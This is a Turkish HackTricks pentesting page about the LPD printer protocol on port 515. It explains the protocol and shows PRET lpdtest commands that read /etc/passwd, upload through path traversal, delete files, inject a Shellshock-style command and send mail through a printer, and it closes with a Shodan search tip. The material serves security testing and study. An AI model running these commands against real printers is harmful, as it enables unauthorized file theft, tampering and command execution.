tip

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

LPD Protokolüne Giriş

1980'lerde, Line Printer Daemon (LPD) protokolü Berkeley Unix'te geliştirilmiş ve daha sonra RFC1179 ile resmileştirilmiştir. Bu protokol, lpr komutu aracılığıyla etkileşimlere olanak tanıyan 515/tcp portu üzerinden çalışır. LPD aracılığıyla yazdırmanın özü, iş detaylarını ve kullanıcıyı belirtmek için bir kontrol dosyası ile yazdırma bilgilerini içeren bir veri dosyası göndermeyi içerir. Kontrol dosyası, veri dosyası için çeşitli dosya formatlarının seçilmesine olanak tanırken, bu dosyaların işlenmesi belirli LPD uygulaması tarafından belirlenir. Unix benzeri sistemler için yaygın olarak bilinen bir uygulama LPRng'dir. Dikkate değer bir şekilde, LPD protokolü kötü niyetli PostScript veya PJL yazdırma işleri yürütmek için istismar edilebilir.

LPD Yazıcıları ile Etkileşim Araçları

PRET, LPD uyumlu yazıcılarla etkileşim kurmak için lpdprint ve lpdtest adlı iki temel aracı tanıtır ve bu araçlar, yazıcıda veri yazdırmaktan dosyaları indirme, yükleme veya silme gibi bir dizi eylemi gerçekleştirmek için basit bir yöntem sunar:

python
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local

Yazıcı hackleme alanını daha fazla keşfetmekle ilgilenen bireyler için kapsamlı bir kaynak burada bulunabilir: Hacking Printers.

Shodan

  • port 515

tip

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin